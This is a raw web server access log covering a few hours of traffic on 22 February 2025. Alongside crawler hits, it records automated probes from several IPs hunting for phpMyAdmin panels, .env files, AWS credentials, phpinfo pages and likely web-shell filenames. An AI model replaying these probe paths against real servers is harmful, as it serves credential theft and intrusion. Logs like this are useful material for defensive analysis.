198.235.24.147 - - [22/Feb/2025:01:04:22 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
141.255.166.90 - - [22/Feb/2025:01:04:35 +0100] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 371 "-" "-"
193.68.89.10 - - [22/Feb/2025:01:38:34 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
121.172.8.112 - - [22/Feb/2025:01:41:02 +0100] "GET / HTTP/1.0" 200 423 "-" "curl/7.88.1"
156.59.198.136 - - [22/Feb/2025:01:52:13 +0100] "GET /ed-test.activities.at/stats/lang/tooltips_w/awstats-tt-dk.txt HTTP/1.0" 404 316 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
88.173.63.150 - - [22/Feb/2025:01:54:01 +0100] "GET / HTTP/1.0" 200 423 "-" "-"
141.255.166.90 - - [22/Feb/2025:02:08:54 +0100] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 371 "-" "-"
45.156.129.133 - - [22/Feb/2025:02:21:37 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
205.210.31.254 - - [22/Feb/2025:02:25:54 +0100] "GET / HTTP/1.0" 200 423 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
80.82.77.202 - - [22/Feb/2025:02:25:58 +0100] "\x16\x03\x02\x01o\x01" 400 383 "-" "-"
193.68.89.51 - - [22/Feb/2025:02:44:42 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
141.255.166.90 - - [22/Feb/2025:03:07:58 +0100] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 371 "-" "-"
154.212.141.222 - - [22/Feb/2025:03:19:23 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
47.128.96.58 - - [22/Feb/2025:03:22:02 +0100] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.128.114.33 - - [22/Feb/2025:03:26:03 +0100] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.128.34.171 - - [22/Feb/2025:03:30:03 +0100] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
193.68.89.10 - - [22/Feb/2025:03:30:58 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
92.202.2.55 - - [22/Feb/2025:03:31:40 +0100] "GET /db/phpMyAdmin-4/index.php?lang=en HTTP/1.1" 404 295 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
92.202.2.55 - - [22/Feb/2025:03:31:42 +0100] "GET /administrator/admin/index.php?lang=en HTTP/1.1" 404 295 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
92.202.2.55 - - [22/Feb/2025:03:31:42 +0100] "GET /mysql/pma/index.php?lang=en HTTP/1.1" 404 291 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
92.202.2.55 - - [22/Feb/2025:03:31:43 +0100] "GET /admin/db/index.php?lang=en HTTP/1.1" 404 289 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
92.202.2.55 - - [22/Feb/2025:03:31:43 +0100] "GET /phpmyadmin2/index.php?lang=en HTTP/1.1" 404 292 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
92.202.2.55 - - [22/Feb/2025:03:31:44 +0100] "GET /db/phpMyAdmin-5/index.php?lang=en HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
92.202.2.55 - - [22/Feb/2025:03:31:44 +0100] "GET /admin/sqladmin/index.php?lang=en HTTP/1.1" 404 292 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
92.202.2.55 - - [22/Feb/2025:03:31:45 +0100] "GET /administrator/pma/index.php?lang=en HTTP/1.1" 404 296 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
92.202.2.55 - - [22/Feb/2025:03:31:45 +0100] "GET /phpMyAdmin-3/index.php?lang=en HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
92.202.2.55 - - [22/Feb/2025:03:31:46 +0100] "GET /phpMyAdmin-5.1.3/index.php?lang=en HTTP/1.1" 404 296 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
92.202.2.55 - - [22/Feb/2025:03:31:47 +0100] "GET /php-my-admin/index.php?lang=en HTTP/1.1" 404 292 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
92.202.2.55 - - [22/Feb/2025:03:31:47 +0100] "GET /phpmyadmin3/index.php?lang=en HTTP/1.1" 404 292 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
92.202.2.55 - - [22/Feb/2025:03:31:48 +0100] "GET /MyAdmin/index.php?lang=en HTTP/1.1" 404 289 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
92.202.2.55 - - [22/Feb/2025:03:31:48 +0100] "GET /sql/sqladmin/index.php?lang=en HTTP/1.1" 404 291 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
92.202.2.55 - - [22/Feb/2025:03:31:49 +0100] "GET /__phpmyadmin/index.php?lang=en HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
92.202.2.55 - - [22/Feb/2025:03:31:49 +0100] "GET /admin/phpMyAdmin/index.php?lang=en HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
92.202.2.55 - - [22/Feb/2025:03:31:50 +0100] "GET /db/phpmyadmin/index.php?lang=en HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
92.202.2.55 - - [22/Feb/2025:03:31:50 +0100] "GET /mysql/web/index.php?lang=en HTTP/1.1" 404 291 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
92.202.2.55 - - [22/Feb/2025:03:31:51 +0100] "GET /db/phpMyAdmin-3/index.php?lang=en HTTP/1.1" 404 295 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
92.202.2.55 - - [22/Feb/2025:03:31:51 +0100] "GET /sql/websql/index.php?lang=en HTTP/1.1" 404 290 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
92.202.2.55 - - [22/Feb/2025:03:31:52 +0100] "GET /phpmyAdmin/index.php?lang=en HTTP/1.1" 404 291 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
92.202.2.55 - - [22/Feb/2025:03:31:52 +0100] "GET /mysql/admin/index.php?lang=en HTTP/1.1" 404 292 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
92.202.2.55 - - [22/Feb/2025:03:31:53 +0100] "GET /db/dbadmin/index.php?lang=en HTTP/1.1" 404 291 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
92.202.2.55 - - [22/Feb/2025:03:31:54 +0100] "GET /database/index.php?lang=en HTTP/1.1" 404 289 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
92.202.2.55 - - [22/Feb/2025:03:31:54 +0100] "GET /sql/webdb/index.php?lang=en HTTP/1.1" 404 290 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
92.202.2.55 - - [22/Feb/2025:03:31:55 +0100] "GET /program/index.php?lang=en HTTP/1.1" 404 290 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
92.202.2.55 - - [22/Feb/2025:03:31:55 +0100] "GET /_phpmyadmin/index.php?lang=en HTTP/1.1" 404 292 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
92.202.2.55 - - [22/Feb/2025:03:31:56 +0100] "GET /phpMyAdmin-5.2.0/index.php?lang=en HTTP/1.1" 404 295 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
92.202.2.55 - - [22/Feb/2025:03:31:56 +0100] "GET /phpMyAdmin5.2/index.php?lang=en HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
92.202.2.55 - - [22/Feb/2025:03:31:57 +0100] "GET /phpmyadmin2019/index.php?lang=en HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
92.202.2.55 - - [22/Feb/2025:03:31:57 +0100] "GET /phpmyadmin1/index.php?lang=en HTTP/1.1" 404 291 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
92.202.2.55 - - [22/Feb/2025:03:31:58 +0100] "GET /phpMyAdmin-latest-english/index.php?lang=en HTTP/1.1" 404 301 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
92.202.2.55 - - [22/Feb/2025:03:31:58 +0100] "GET /sql/sql/index.php?lang=en HTTP/1.1" 404 287 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
92.202.2.55 - - [22/Feb/2025:03:31:59 +0100] "GET /mysql/mysqlmanager/index.php?lang=en HTTP/1.1" 404 295 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
92.202.2.55 - - [22/Feb/2025:03:31:59 +0100] "GET /phpmyadmin2021/index.php?lang=en HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
92.202.2.55 - - [22/Feb/2025:03:32:00 +0100] "GET /sql/php-myadmin/index.php?lang=en HTTP/1.1" 404 295 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
92.202.2.55 - - [22/Feb/2025:03:32:01 +0100] "GET /db/dbweb/index.php?lang=en HTTP/1.1" 404 289 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
92.202.2.55 - - [22/Feb/2025:03:32:01 +0100] "GET /db/websql/index.php?lang=en HTTP/1.1" 404 290 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
92.202.2.55 - - [22/Feb/2025:03:32:02 +0100] "GET /phpMyAdmin1/index.php?lang=en HTTP/1.1" 404 292 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
92.202.2.55 - - [22/Feb/2025:03:32:02 +0100] "GET /sqlmanager/index.php?lang=en HTTP/1.1" 404 292 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
92.202.2.55 - - [22/Feb/2025:03:32:03 +0100] "GET /administrator/db/index.php?lang=en HTTP/1.1" 404 295 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
92.202.2.55 - - [22/Feb/2025:03:32:03 +0100] "GET /phpMyAdmin5/index.php?lang=en HTTP/1.1" 404 292 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
92.202.2.55 - - [22/Feb/2025:03:32:05 +0100] "GET /phpMyAdmin-5.2.1/index.php?lang=en HTTP/1.1" 404 295 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
92.202.2.55 - - [22/Feb/2025:03:32:42 +0100] "-" 408 - "-" "-"
47.128.63.144 - - [22/Feb/2025:03:34:05 +0100] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
121.153.44.8 - - [22/Feb/2025:03:37:13 +0100] "GET / HTTP/1.0" 200 423 "-" "curl/7.88.1"
156.59.198.136 - - [22/Feb/2025:03:42:00 +0100] "GET /ed-test.activities.at/stats/lang/tooltips_w/awstats-tt-nb.txt HTTP/1.0" 404 315 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
141.255.166.90 - - [22/Feb/2025:03:55:35 +0100] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 371 "-" "-"
74.82.47.3 - - [22/Feb/2025:03:57:38 +0100] "\x16\x03\x01" 400 383 "-" "-"
220.119.146.67 - - [22/Feb/2025:03:58:37 +0100] "GET / HTTP/1.0" 200 423 "-" "curl/7.88.1"
23.146.184.101 - - [22/Feb/2025:04:00:26 +0100] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
23.146.184.101 - - [22/Feb/2025:04:00:26 +0100] "POST / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
23.146.184.101 - - [22/Feb/2025:04:00:27 +0100] "GET /sendgrid/.env HTTP/1.1" 404 286 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
23.146.184.101 - - [22/Feb/2025:04:00:27 +0100] "POST / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
156.59.198.135 - - [22/Feb/2025:04:02:02 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10396793.pdf HTTP/1.0" 404 323 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
217.160.11.27 - - [22/Feb/2025:04:03:06 +0100] "GET //thoms.php HTTP/1.1" 404 294 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
217.160.11.27 - - [22/Feb/2025:04:03:25 +0100] "GET //inputs.php HTTP/1.1" 404 295 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
217.160.11.27 - - [22/Feb/2025:04:03:33 +0100] "GET //userfuns.php HTTP/1.1" 404 296 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
217.160.11.27 - - [22/Feb/2025:04:03:42 +0100] "GET //tempfuns.php HTTP/1.1" 404 297 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
217.160.11.27 - - [22/Feb/2025:04:03:45 +0100] "GET //termps.php HTTP/1.1" 404 295 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
217.160.11.27 - - [22/Feb/2025:04:03:57 +0100] "GET //classfuns.php HTTP/1.1" 404 297 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
156.59.198.136 - - [22/Feb/2025:04:07:35 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10625480.pdf HTTP/1.0" 404 321 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [22/Feb/2025:04:16:14 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202104261003_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
180.149.125.172 - - [22/Feb/2025:04:19:39 +0100] "GET /stalker_portal/server/tools/auth_simple.php HTTP/1.1" 404 304 "-" "Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36"
156.59.198.136 - - [22/Feb/2025:04:20:14 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10533009.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
185.242.226.116 - - [22/Feb/2025:04:27:53 +0100] "GET /activities.ico HTTP/1.1" 200 1406 "-" "python-requests/2.26.0"
185.242.226.116 - - [22/Feb/2025:04:27:53 +0100] "GET / HTTP/1.1" 200 274 "-" "python-requests/2.26.0"
78.153.140.179 - - [22/Feb/2025:04:56:17 +0100] "GET /.env HTTP/1.1" 404 349 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; AskTbHKCIE/5.15.15.35882; BOIE8;ENUS)"
78.153.140.179 - - [22/Feb/2025:04:56:17 +0100] "\x16\x03\x01" 400 383 "-" "-"
78.153.140.179 - - [22/Feb/2025:04:57:13 +0100] "GET /backend/.env HTTP/1.1" 404 357 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:42.0) Gecko/20100101 Firefox/42.0"
78.153.140.179 - - [22/Feb/2025:04:57:39 +0100] "GET /api/.env HTTP/1.1" 404 353 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.54 Safari/535.2"
156.59.198.136 - - [22/Feb/2025:04:57:41 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202105211003_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
78.153.140.179 - - [22/Feb/2025:04:57:48 +0100] "GET /admin/.env HTTP/1.1" 404 355 "-" "Mozilla/5.0 (X11; U; Linux i686; rv:1.9) Gecko/20080810020329 Firefox/3.0.1"
78.153.140.179 - - [22/Feb/2025:04:58:02 +0100] "GET /info/ HTTP/1.1" 404 350 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; hu-HU) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16"
78.153.140.179 - - [22/Feb/2025:04:58:05 +0100] "GET /app_dev.php/_profiler/open?file=app/config/parameters.yml HTTP/1.1" 404 371 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.197 Safari/532.0"
78.153.140.179 - - [22/Feb/2025:04:58:15 +0100] "GET /?phpinfo=-1 HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Linux; U; Android 4.1.2; en-gb; GT-N8010 Build/JZO54K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30"
78.153.140.179 - - [22/Feb/2025:04:58:20 +0100] "GET /.env.example HTTP/1.1" 404 357 "-" "Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.2.15 Version/10.00"
78.153.140.179 - - [22/Feb/2025:04:58:24 +0100] "GET /phpinfo.php HTTP/1.1" 200 63007 "-" "Mozilla/5.0 (Linux; Android 7.1.1; Z982 Build/NMF26V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Mobile Safari/537.36"
78.153.140.179 - - [22/Feb/2025:04:59:13 +0100] "GET /.env.production HTTP/1.1" 404 360 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0"
78.153.140.179 - - [22/Feb/2025:04:59:22 +0100] "GET /app_dev.php/_profiler/phpinfo HTTP/1.1" 404 374 "-" "Mozilla/5.0 (Android 5.1; Mobile; rv:49.0) Gecko/49.0 Firefox/49.0"
78.153.140.179 - - [22/Feb/2025:04:59:23 +0100] "GET /demo/.env HTTP/1.1" 404 354 "-" "Mozilla/5.0 (X11; CrOS x86_64 5841.83.0) AppleWebKit/537.36 (KHTML like Gecko) Chrome/36.0.1985.138 Safari/537.36"
78.153.140.179 - - [22/Feb/2025:04:59:24 +0100] "GET /app/.env HTTP/1.1" 404 353 "-" "Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)"
78.153.140.179 - - [22/Feb/2025:04:59:52 +0100] "GET /core/.env HTTP/1.1" 404 354 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; it-it) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/4.1.3 Safari/533.19.4"
78.153.140.179 - - [22/Feb/2025:05:00:00 +0100] "GET /.aws/credentials HTTP/1.1" 404 361 "-" "Mozilla/5.0 (X11; Linux i686; rv:49.0) Gecko/20100101 Firefox/49.0 SeaMonkey/2.46"
78.153.140.179 - - [22/Feb/2025:05:00:30 +0100] "GET /Dev/.env HTTP/1.1" 404 353 "-" "Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.1.1) Gecko/20090722 Gentoo Firefox/3.5.1"
78.153.140.179 - - [22/Feb/2025:05:00:37 +0100] "GET /secrets.env HTTP/1.1" 404 356 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.8 (KHTML, like Gecko) Version/10.1 Safari/603.1.30"
78.153.140.179 - - [22/Feb/2025:05:00:49 +0100] "GET /test/.env HTTP/1.1" 404 354 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.24 Safari/534.7"
78.153.140.179 - - [22/Feb/2025:05:00:50 +0100] "GET /blogs/.env HTTP/1.1" 404 355 "-" "Mozilla/5.0 (iPad; CPU OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) FxiOS/6.1 Mobile/14D27 Safari/602.4.6"
78.153.140.179 - - [22/Feb/2025:05:00:57 +0100] "GET /client/.env HTTP/1.1" 404 356 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/534.57.5 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.4"
78.153.140.179 - - [22/Feb/2025:05:01:09 +0100] "GET /templates/.env HTTP/1.1" 404 359 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/0.3.154.6 Safari/525.19"
78.153.140.179 - - [22/Feb/2025:05:01:20 +0100] "GET /saas/.env HTTP/1.1" 404 354 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/600.7.11 (KHTML, like Gecko) Version/8.0.7 Safari/600.7.11"
78.153.140.179 - - [22/Feb/2025:05:01:27 +0100] "GET /content/.env HTTP/1.1" 404 357 "-" "Mozilla/5.0 (X11; U; Linux i686; pl; rv:1.8) Gecko/20051111 Firefox/1.5 Ubuntu"
78.153.140.179 - - [22/Feb/2025:05:01:27 +0100] "GET /old/.env HTTP/1.1" 404 353 "-" "Mozilla/5.0 (Linux; U; Android 2.3.4; en-gb; GT-I9100 Build/GINGERBREAD) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1"
78.153.140.179 - - [22/Feb/2025:05:01:28 +0100] "GET /.gitlab-ci/.env HTTP/1.1" 404 360 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.91 Safari/537.36 OPR/48.0.2685.32"
78.153.140.179 - - [22/Feb/2025:05:01:29 +0100] "GET /docker/.env HTTP/1.1" 404 356 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:5.0) Gecko/20100101 Firefox/5.0"
78.153.140.179 - - [22/Feb/2025:05:01:30 +0100] "GET /etc/.env HTTP/1.1" 404 353 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_0_3 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/10.1 EdgiOS/41.1.0.35 Mobile/15A432 Safari/602.1"
78.153.140.179 - - [22/Feb/2025:05:01:30 +0100] "GET /alpha/.env HTTP/1.1" 404 355 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/6.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; Zune 4.7; Tablet PC 2.0)"
78.153.140.179 - - [22/Feb/2025:05:01:33 +0100] "GET /basic-network/.env HTTP/1.1" 404 363 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36 OPR/46.0.2597.46"
